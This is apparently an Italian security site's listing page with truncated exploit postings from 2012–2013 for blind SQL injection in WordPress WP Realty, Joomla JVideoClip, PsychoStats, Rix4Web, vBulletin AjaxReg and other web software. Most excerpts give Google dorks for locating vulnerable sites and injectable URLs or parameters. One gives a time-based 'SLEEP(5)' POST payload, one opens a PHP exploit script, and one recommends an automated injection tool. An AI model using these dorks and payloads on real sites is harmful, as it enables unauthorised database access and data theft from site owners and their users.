WordPress WP Realty Blind SQL Injection

28 ottobre 2013 - Fonte: http://www.mondounix.com
$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
 
 
Credits...

Leggi il seguito »

mod_accounting 0.5 Blind SQL Injection

29 settembre 2013 - Fonte: http://www.mondounix.com
   - Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
   - Affected Software: mod_accounting
   - Affected Version: 0.5. Other earlier versions may be affected.
   - Issue type: Blind SQL injection
   - Release Date: 20 Sep 2013
   - Discovered by: Eldar "Wireghoul" Marcussen
   - CVE Identifier: CVE-2013-5697
   - Issue status: Abandoned software, no patch available
 
Summary
 
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received...

Leggi il seguito »

Joomla JVideoClip Blind SQL Injection

24 settembre 2013 - Fonte: http://www.mondounix.com
================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog      : http://sixp4ck3r.blogspot.com/
Credits        : To my love!
Dork           : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind...

Leggi il seguito »

PsychoStats 3.2.2b Blind SQL Injection

29 marzo 2013 - Fonte: http://www.mondounix.com
Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link:http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
 
 
Use Havij to easy exploit
Enjoy
 
 
S.Th To a El Koyot
 
end
...

Leggi il seguito »

Rix4Web Portal Remote Blind SQL Injection

24 febbraio 2013 - Fonte: http://www.mondounix.com
################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
#...

Leggi il seguito »

Zenphoto 1.4.4.1 Blind SQL Injection

21 febbraio 2013 - Fonte: http://www.mondounix.com
######################################################################################
#                                                                                    #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection                           #
#                                                                                    #
# Author        : HosseinNsn                                                         #
#                                                                                    #
# Home          : http://Emperor-Team.Org                                            #
#                                                                                    #
# Software Link : http://www.zenphoto.org     ...

Leggi il seguito »

Paypal.com Blind SQL Injection

23 gennaio 2013 - Fonte: http://www.mondounix.com
Title:
======
Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability
 
 
Date:
=====
2013-01-22
 
 
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=673
 
http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml
 
 
VL-ID:
=====
673
 
 
Common Vulnerability Scoring System:
====================================
8.3
 
 
Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money...

Leggi il seguito »

vBulletin 3.x / 4.x AjaxReg SQL Injection

10 dicembre 2012 - Fonte: http://www.mondounix.com
#!/usr/bin/php
<?
 
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
# check it : http://localhost/vBulletin/clientscript/register.js
 
function usage ()
{
    echo
        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
        "\n[+] Author: Cold z3ro".
        "\n[+] Site  : http://www.hackteach.org | http://www.s3curi7y.com".
        "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
        "\n[+] Usage : php 0day.php <hostname>...

Leggi il seguito »

Midwest Marketing (display_products.php) Blind SQL Vulnerability

12 novembre 2012 - Fonte: http://www.mondounix.com
#########################################################################
# Exploit Title: [ Midwest Marketing (display_products.php) Blind SQL Vulnerability ]                
# Date: [12-11-2012]                                                   
# Author: [ShinoBi-Dz]
# E-mail : ShinoBiDz442@gmail.com                                      
# Facebook : https://www.facebook.com/shinobi.DZz                     
# Category: [webapps]                                                   
# Google dork: "Designed by Midwest Marketing, LLC" inurl:display_products.php?id=
# Tested on: [Windows 7 ]                                              
#########################################################################
 
[~]Exploit/p0c...

Leggi il seguito »

netOffice Dwins 1.4p3 SQL Injection

12 novembre 2012 - Fonte: http://www.mondounix.com
:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
  [ 2012-11-08                              ]
#################################################################
#  [ netOffice Dwins <= 1.4p3 ]  SQL Injection Vulnerability    #
#################################################################
#
# Script: "netOffice Dwins is a free web based time tracking, timesheet,
#          content management, issue tracking, and project management environment."
#
# Vendor:   http://sourceforge.net/projects/netofficedwins/
#...

Leggi il seguito »